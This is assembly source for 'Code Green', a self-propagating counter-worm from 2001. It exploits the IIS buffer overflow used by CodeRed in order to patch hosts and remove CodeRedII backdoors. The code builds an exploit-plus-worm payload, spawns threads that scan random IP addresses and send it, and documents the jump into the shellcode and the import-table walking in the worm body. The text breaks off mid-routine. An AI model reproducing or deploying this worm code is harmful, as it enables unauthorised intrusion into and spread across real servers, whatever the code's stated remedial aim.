; Code Green (AntiCodeRed/IDQPatcher/whatever you want) V1.0 BETA [23.08.2001]
; assemble with:
; 	ML /Dmasm /c /Cx /coff CodeGreen.asm
; link with:
; 	LINK CodeGreen.obj /entry:_Entry /subsystem:windows /base:65536

;aims:
; * patch vulnerable systems
; * remove CodeRedII backdoors

;known problems:
; * plenty of probs ... ;(
; * propagation threads will stop (criticalsection), in case only one thread should block while sending
; * don't know if CodeGreen will correctly determine system language
; * don't know if CG will correctly apply patch to all systems
; * don't know if this code would work at all (had not enough time to exessively debug it;()

;known bugs:
; * currently none (inform me if you should find some weak code)

;credits:
; * @eEye: you guys surely did great work finding that bug
; * @MS: thanks for delivering a hotfix that works with system privileges
;	(plus: does not show messagebox when executed with system privileges;))
; * @CodeRedI author: thanks for this great exploit vector; good job
; * @CodeRedII author: sorry for providing code/the base for a code
;	that will/could potentially take your systems
; * @all: it's my first one ...
;	... so please don't flame me for weak coding ...
;	... be nice guys and send me your modified versions of this code.

;debug instructions:
; * assemble CodeGreen.asm
     (or remove txt-extension from CodeGreen.exe.txt [at your own risk])
; * debug your iis
; * go to 0x7801CBD3h (call ebx)
; * set breakpoint there
; * execute betaversion and walk through the code
; * be sure to stay offline, especially when using the preassembled version

;DISCLAIMER:
; (blahblah) ... i will not take responsibility for any bugy in this code
;(THIS IS ONLY A BETA VERSION, WHICH HAS BUGS IN IT).
;in fact i will not take responsibility for this code/included files at all.
;if you use this code or the pre-assembled version, you should know what you are doing.
;hell ... if you can't keep the code on your local iis, it's your fault.
;(i really don't know if this code is working at all
; ... currently it's 10:20 a.m. in germany and it's getting pretty late ...
; ... but tomorry i will be on vacation and perhaps there might be someone out there,
; who could finish my work.)

;sidenote: i did not have the time to optimize the code and to
	write some nice comments; sorry.

.386
.model flat, stdcall
option casemap:none

; ***** ***** Includes ***** *****

	include windows.inc
	include kernel32.inc
	include advapi32.inc
	include wsock32.inc
	includelib kernel32.lib
	includelib advapi32.lib
	includelib wsock32.lib

CGLen EQU CGEnd - CGBegin
CGInitLen EQU CGEnd - CGInit
UDataLen EQU UDataEnd - UDataBegin

.Code

CGInit EQU $
	_Entry:
		.Data
			OldProtection	DD	0
		.Code
			call AdjustCodeSegment
		AdjustCodeSegment:
			pop ebp
			mov eax, CGInitLen
			invoke VirtualProtect, ebp, eax, PAGE_EXECUTE_READWRITE, offset OldProtection
			cmp eax, TRUE
			je _Prologue2
				INT 3
				call GetLastError
				ret

	_Prologue2:
		.Data
			msvcrt_dll	DB	"msvcrt.dll", 0
		.Code
		invoke LoadLibrary, offset msvcrt_dll
			mov esi, eax						;esi -> msvcrt.dll
			add esi, 00050824h
			cmp eax, NULL
			jne _DEBUG ;_CGEntry
				INT 3
				call GetLastError
				ret

	_DEBUG:
		call LaengeCodeGreenCodeBerechnen

	_CGInit:
		.Data
			CGInit_WSAData			DW	0
							DW	0
							DB	257 DUP (0)
							DB	257 DUP (0)
							DW	0
							DW	0
							DD	0

			CGInit_CurrentIP		DD	7F000001h
			CGInit_IoctlSocket_Arg		DD	0
			CGInit_SockAddr			DW	0
							DW	0
							DD	0
							DD	2 DUP (0)
			CGInit_fd_set			DD	1
							DD	1
							DD	63 DUP (0)
		.Data?
			CGInit_CGCodeLen		DD	0 ;Code
			CGInit_CGLen			DD	0 ;Exploit+Code
			CGInit_NewCodeGreen		DB	6000 DUP (?)
		.Code
		call LaengeCodeGreenCodeBerechnen
		xor ebp, ebp ;set initial base-pointer
		jmp CGInit_Get_Used_PropagationThreadFunctions

			LaengeCodeGreenCodeBerechnen:
			pushad
				mov eax, CGLen
				mov [CGInit_CGCodeLen], eax
				lea esi, CodeGreenExploitLenStr

				xor edx, edx
				mov ecx, 1000
				div ecx ;EDX-EAX:ECX Rest:edx Erg:eax
				add eax, 48
				mov [esi], al
				mov eax, edx

				xor edx, edx
				mov ecx, 100
				div ecx
				add eax, 48
				mov [esi+1], al
				mov eax, edx

				xor edx, edx
				mov ecx, 10
				div ecx
				add eax, 48
				mov [esi+2], al
				mov eax, edx

				add eax, 48
				mov [esi+3], al
			popad
			ret


	CGInit_Get_Used_PropagationThreadFunctions:

		mov eax, EnterCriticalSection
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_EnterCriticalSection], eax

		mov eax, LeaveCriticalSection
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_LeaveCriticalSection], eax

		mov eax, socket
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_socket], eax

		mov eax, ioctlsocket
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_ioctlsocket], eax

		mov eax, connect
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_connect], eax

		mov eax, select
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_select], eax

		mov eax, send
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_send], eax

		mov eax, closesocket
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_closesocket], eax

		mov eax, GetSystemTime
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_GetSystemTime], eax

		mov eax, Sleep
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_Sleep], eax

	CGInit_BuildCodeGreen:
		lea esi, [ebp][CodeGreenExploit]
		mov eax, CGExploitLen + CGLen
		mov ecx, eax
		shr ecx, 2 ;div 4
		inc ecx
		mov ebx, ecx	;ebx: NrOfPushs
		CGInit_ReserveStackLoop:
			push 090909090h
			loop CGInit_ReserveStackLoop
			push ebx	;first DW in stack-field holds NrOfPushs

			mov [ebp][ptrNewCodeGreen], esp

		CGInit_CopyCodeGreenExploit:
			mov ecx, CGExploitLen ;eax
			lea edi, [esp+4]
			cld
			rep movsb

		CGInit_AddCodeGreenCode:
			lea esi, [ebp][_CGEntry]
			mov ecx, CGLen
			rep movsb

	CGInit_StartPropagation:
		mov [ebp][NrOfThreads], word ptr 0
		mov [ebp][EndThreadsFlag], byte ptr 0
		mov [ebp][CurrentIP], dword ptr 7F000000h ;does propagation thread only send one copy to the local IIS?
			;7FFFFFFDh ;=127.255.255.254 => no random IP generation, hits local Port 80 1 time

		CGInit_InitializeSockets:
				push offset CGInit_WSAData
				push 0101h
			CALL WSAStartup

		CGInit_Main_StartRandomGenerator:
			push 0
				push esp
				push 0
				push ebp
				lea eax, [ebp][RandomGenerator]
				push eax
				push 0
				push 0
			CALL CreateThread
			pop eax

		CGInit_Initialise_Critical_Sections:
			lea eax, [ebp][CritSec_GetIP]
				push eax
			CALL InitializeCriticalSection

			lea eax, [ebp][CritSec_SendCG]
				push eax
			CALL InitializeCriticalSection

		CGInit_Propagation_ThreadLoop:
			push 0
				push esp
				push 0
				push ebp
				lea eax, [ebp][_ThreadFunction]
				push eax
				push 0
				push 0
			CALL CreateThread
			pop eax

				push 100
			CALL Sleep
		cmp [ebp][NrOfThreads], word ptr MAX_NR_OF_THREADS
		jl CGInit_Propagation_ThreadLoop

	CGInit_ResetPropagation:

		CGInit_Main_WaitLoop:
				push 60000	;60 secs
			CALL Sleep

			CGInit_Main_StartRandomIPSearchAgain:
				lea edx, [ebp][CritSec_GetIP]	;EnterCriticalSection
					push edx
				CALL EnterCriticalSection
			mov [ebp][CurrentIP], dword ptr 0
				lea edx, [ebp][CritSec_GetIP]	;LeaveCriticalSection
					push edx
				CALL LeaveCriticalSection
		jmp CGInit_Main_WaitLoop

;*********************************************************************************************************************************
;************************************************   EXPLOIT VECTOR   *************************************************************
;*********************************************************************************************************************************
	;esp: 7801CBD3h;		[7801CBD3]:	FF 29	call ebx
	;      ->00D3F0E8 90                  nop
	;	00D3F0E9 90                   nop
	;	00D3F0EA 58                 ! pop         eax
	;	00D3F0EB 68 D3 CB 01 78     ! push        7801CBD3h
	;	00D3F0F0 90                   nop
	;	00D3F0F1 90                   nop
	;	00D3F0F2 90                   nop
	;	00D3F0F3 90                   nop
	;	00D3F0F4 90                   nop
	;	00D3F0F5 81 C3 00 03 00 00    add         ebx,300h
	;	00D3F0FB 8B 1B                mov         ebx,dword ptr [ebx]
	;	00D3F0FD 53                 ! push        ebx				(ebx: 00B02698h)
	;	00D3F0FE FF 53 78           ! call        dword ptr [ebx+78h]		pushes 00D3F100h
	;Stack:
	;	[esp]: 00D3F100h, 00B02698h(esp+4), 7801CBD3h(esp+8)
;*********************************************************************************************************************************
;**************************************************   WORM CODE   ****************************************************************
;*********************************************************************************************************************************
CGBegin EQU $
	_CGEntry:
		call _GetEIP
	_GetEIP:
			;00011000 E8 00 00 00 00       call        00011005
			;00011005 5D                   pop         ebp				;ebp > 00011005 z.B. ebp=00401005
			;00011006 B8 06 10 01 00       mov         eax,11006h
			;0001100B 48                   dec         eax				;eax=11005 (STATISCH!)
			;0001100C 55                   push        ebp
			;0001100D 2B E8                sub         ebp,eax			;ebp = ebp - eax	=> Variablenangleichung m鰃lich!
			;0001100F 58                   pop         eax
			;00011010 83 E8 05             sub         eax,5			;eax -> _Entry		=> wir haben komfortablen Zeiger auf den VirenCode!

		pop ebp
		mov eax, $
		dec eax							;eax=11005 (STATISCH!); d.h.: eax zeigt auf "pop ebp"
		push ebp
			sub ebp, eax					;ebp -> (_CGEntry - eax); d.h.: ebp + offset VAR = EffectiveAddressOf Var
		pop eax
		sub eax, 5						;eax -> _CGEntry (VARIABEL!)
		;mov [ebp][BasePointerCode], eax

	push ebp			;Push the BasePointer to stack

	;**********************************************************************************
	;***                              init                                     ***
	;**********************************************************************************

	_GetMsvcrtBaseAndSearchGetProcAddrEntry:
		mov esi, 78000000h ;[esp+12]			;esi: 7801CBD3h (see above)

		;call SearchMZHeader

		lea ebx, [ebp][Str_GetProcAddr]
		mov ecx, Len_GetProcAddr
		mov ebp, dword ptr esi

		mov esi, dword ptr [esi+3Ch]
		add esi, ebp

		mov esi, dword ptr [esi+80h]	;78h=ExportTable 80h=ImportTable
		add esi, ebp

		mov edi, esi			;edi -> ImageImportTable
		sub edi, 14h
		SearchIMAGE_IMPORT_DESCRIPTORs:
			add edi, 14h		;edi -> nextImportDescriptor
			mov esi, [edi+12]		;esi -> Name
			add esi, ebp
			mov esi, [esi]
			cmp esi, "NREK"
			jne SearchIMAGE_IMPORT_DESCRIPTORs

		IMAGE_KERNEL_IMPORT_DESCRIPTOR_Found:	;edi -> KernelImportDescriptor
			mov esi, [edi+10h]		;esi -> PIMAGE_THUNK_DATA (Address-Table)
			add esi, ebp		;[ebp][MsvcrtBase]
			mov edi, [edi]			;edi -> IMAGE_IMPORT_BY_NAME - Pointers (Name-Table)
			add edi, ebp		;[ebp][MsvcrtBase]

			xchg ebx, esi			;ebx=esi; esi -> Str_GetProcAddr

			xor edx, edx			;edx : Z鋒ler

			cld
		SearchPointerTableLoop:
			inc edx		
			pushad
				add [esp], dword ptr 4 ;"add edi, 4" after "popad"
				mov edi, [edi]
				add edi, ebp
				add edi, 2		;edi -> ProcName ;shl edi ...
				CompareTheTwoNames:
					repe cmpsb
			popad
			jnz SearchPointerTableLoop ;the strings are not equal

		FunctionFound: ;edx: NrIn_IMPORT_TABLE
			dec edx
			shl edx, 2 ;edx=edx*4
			add ebx, edx
			mov edx, [ebx]						;EDX: GetProcAddr

	pop ebp
		mov [ebp][ProcTable+API_GetProcAddr], edx
		mov esi, edx

		call SearchMZHeader		;esi -> KernelBase

		lea edi, [ebp][DllTable]
	push edi
		mov [edi], esi